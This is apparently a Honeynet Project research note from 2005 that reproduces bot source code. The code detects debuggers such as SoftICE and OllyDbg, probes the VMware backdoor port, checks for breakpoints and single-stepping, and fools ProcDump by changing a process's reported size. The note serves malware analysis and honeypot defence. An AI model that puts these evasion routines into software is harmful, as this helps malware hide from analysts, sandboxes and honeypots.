Honeynet Project
Last Modified: 17 February, 2005
In this side note, we take a closer look at the source code of some bots. We demonstrate several examples of techniques used by current bots to either speed-up computations or to detect suspicious environments, such as detection of debuggers or virtual machines such as VMware. Furthermore, some bots use different techniques to make forensic analysis much more difficult.
/* Function: IsSICELoaded Description: This method is used by a lot of crypters/compresors it uses INT 41, this interrupt is used by Windows debugging interface to detect if a debugger is present. Only works under Windows. Returns: true if a debugger is detected */ __inline bool IsSICELoaded() { _asm { mov ah, 0x43 int 0x68 cmp ax, 0x0F386 // Will be set by all system debuggers. jz out_ xor ax, ax mov es, ax mov bx, word ptr es:[0x68*4] mov es, word ptr es:[0x68*4+2] mov eax, 0x0F43FC80 cmp eax, dword ptr es:[ebx] jnz out_ jmp normal_ normal_: xor eax, eax leave ret out_: mov eax, 0x1 leave ret } return false; }
/* Function: IsSoftIceNTLoaded Description: Like the previous one but for use under Win NT only Returns: true if SoftIce is loaded */ __inline BOOL IsSoftIceNTLoaded() { HANDLE hFile=CreateFile( "\\\\.\\NTICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(hFile!=INVALID_HANDLE_VALUE) { CloseHandle(hFile); return true; } return false; }
/* Function: IsODBGLoaded Description: Tests if OllyDbg/other app debuggers is/are enabled Returns: true if a debugger is detected */ __inline bool IsODBGLoaded() { char *caption="DAEMON"; _asm { push 0x00 push caption mov eax, fs:[30h] // pointer to PEB movzx eax, byte ptr[eax+0x2] or al,al jz normal_ jmp out_ normal_: xor eax, eax leave ret out_: mov eax, 0x1 leave ret } }
/* Functions are declared as __inline, this causes the expansion of this code each time a function is invoked, this is to difficult the cracker work by using this function more than once time Function: IsBPX Description: Checks if the given memory address is a breakpoint Returns: true if it is a breakpoint */ __inline bool IsBPX(void *address) { _asm { mov esi, address // load function address mov al, [esi] // load the opcode cmp al, 0xCC // check if the opcode is CCh je BPXed // yes, there is a breakpoint // jump to return true xor eax, eax // false, jmp NOBPX // no breakpoint BPXed: mov eax, 1 // breakpoint found NOBPX: } }
/* executes VMware backdoor I/O function call */ #define VMWARE_MAGIC 0x564D5868 // Backdoor magic number #define VMWARE_PORT 0x5658 // Backdoor port number #define VMCMD_GET_VERSION 0x0a // Get version number int VMBackDoor(unsigned long *reg_a, unsigned long *reg_b, unsigned long *reg_c, unsigned long *reg_d) { unsigned long a, b, c, d; b=reg_b?*reg_b:0; c=reg_c?*reg_c:0; xtry { __asm { push eax push ebx push ecx push edx mov eax, VMWARE_MAGIC mov ebx, b mov ecx, c mov edx, VMWARE_PORT in eax, dx mov a, eax mov b, ebx mov c, ecx mov d, edx pop edx pop ecx pop ebx pop eax } } xcatch(...) {} if(reg_a) *reg_a=a; if(reg_b) *reg_b=b; if(reg_c) *reg_c=c; if(reg_d) *reg_d=d; return a; } /* Check VMware version only */ int VMGetVersion() { unsigned long version, magic, command; command=VMCMD_GET_VERSION; VMBackDoor(&version, &magic, &command, NULL); if(magic==VMWARE_MAGIC) return version; else return 0; } /* Check if running inside VMWare */ int IsVMWare() { int version=VMGetVersion(); if(version) return true; else return false; }
/* Fool ProcDump with increasing size */ void FoolProcDump() { __asm { mov eax, fs:[0x30] mov eax, [eax+0xC] mov eax, [eax+0xC] add dword ptr [eax+0x20], 0x2000 // increase size variable } }
bool CDebugDetect::IsDebug() { #ifdef _DEBUG return false; #else if(m_bIsDebug) return true; #ifndef _WIN32 // Anti-PTrace // if(ptrace(PTRACE_TRACEME, 0, 1, 0)<0) { // m_bIsDebug=true; return true; // } #else pfnIsDebuggerPresent IsDbgPresent=NULL; HMODULE hK32=GetModuleHandle("KERNEL32.DLL"); if(!hK32) hK32=LoadLibrary("KERNEL32.DLL"); if(hK32) { IsDbgPresent=(pfnIsDebuggerPresent)GetProcAddress(hK32, "IsDebuggerPresent"); } FoolProcDump(); ScrewWithVirtualPC(); unsigned long lStartTime=GetTickCount(); if(IsBPX(&IsBPX)) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Breakpoint set on IsBPX, debugger active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } if(IsBPX(&IsSICELoaded)) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Breakpoint set on IsSICELoaded, debugger active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } if(IsBPX(&IsSoftIceNTLoaded)) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Breakpoint set on IsSoftIceNTLoaded, debugger active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } if(IsBPX(&IsVMWare)) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Breakpoint set on IsVMWare, debugger active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } if(IsSoftIceNTLoaded()) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "SoftIce named pipe exists, maybe debugger is active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } if(IsSICELoaded()) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "SoftIce is loaded, debugger active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } // if(IsVMWare()) { //#ifdef DBGCONSOLE // g_cConsDbg.Log(5, "Running inside VMWare, probably honeypot...\n"); //#endif // DBGCONSOLE // m_bIsDebug=true; return true; // } if(IsDbgPresent) { if(IsBPX(&IsDbgPresent)) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Breakpoint set on IsDebuggerPresent, debugger active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } if(IsDbgPresent()) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "IsDebuggerPresent returned true, debugger active...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } } if((GetTickCount()-lStartTime) > 5000) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Routine took too long to execute, probably single-step...\n"); #endif // DBGCONSOLE m_bIsDebug=true; return true; } #endif // WIN32 return false; #endif // _DEBUG }
/* This calculates a TCP/IP checksum */ #ifdef WIN32 #define USE_ASM #endif // WIN32 unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum=0; #ifdef USE_ASM unsigned long lsize=size; char szMMBuf[8], *pMMBuf=szMMBuf; __asm { FEMMS MOV ECX, lsize // ecx=lsize; MOV EDX, buffer // edx=buffer; MOV EBX, cksum // ebx=cksum; CMP ECX, 2 // size<2; JS CKSUM_LOOP2 // goto loop 2 CKSUM_LOOP: XOR EAX, EAX // eax=0; MOV AX, WORD PTR [EDX] // ax=(unsigned short*)*buffer; ADD EBX, EAX // cksum+=(unsigned short*)*buffer; SUB ECX, 2 // size-=2; ADD EDX, 2 // buffer+=2; CMP ECX, 1 // size>1 JG CKSUM_LOOP // while(); CMP ECX, 0 // if(!size); JE CKSUM_FITS // fits if equal CKSUM_LOOP2: XOR EAX, EAX // eax=0; MOV AL, BYTE PTR [EDX] // al=(unsigned char*)*buffer; ADD EBX, EAX // cksum+=(unsigned char*)*buffer; SUB ECX, 1 // size-=1; ADD EDX, 1 // buffer+=1; CMP ECX, 0 // size>0; JG CKSUM_LOOP2 // while(); CKSUM_FITS: MOV cksum, EBX // cksum=ebx; MOV EAX, cksum // eax=cksum; SHR EAX, 16 // eax=cksum>>16; MOV EBX, cksum // ebx=cksum; AND EBX, 0xffff // ebx=cksum&0xffff; ADD EAX, EBX // eax=(cksum>>16)+(cksum&0xffff); MOV EBX, EAX // ebx=cksum; SHR EBX, 16 // ebx=cksum>>16; ADD EAX, EBX // cksum+=(cksum>>16); MOV cksum, EAX // cksum=EAX; FEMMS } #else // USE_ASM while(size>1) { cksum+=*buffer++; size-=2; } if(size) cksum+=*(unsigned char*)buffer; cksum=(cksum>>16)+(cksum&0xffff); cksum+=(cksum>>16); #endif // USE_ASM return (unsigned short)(~cksum); } */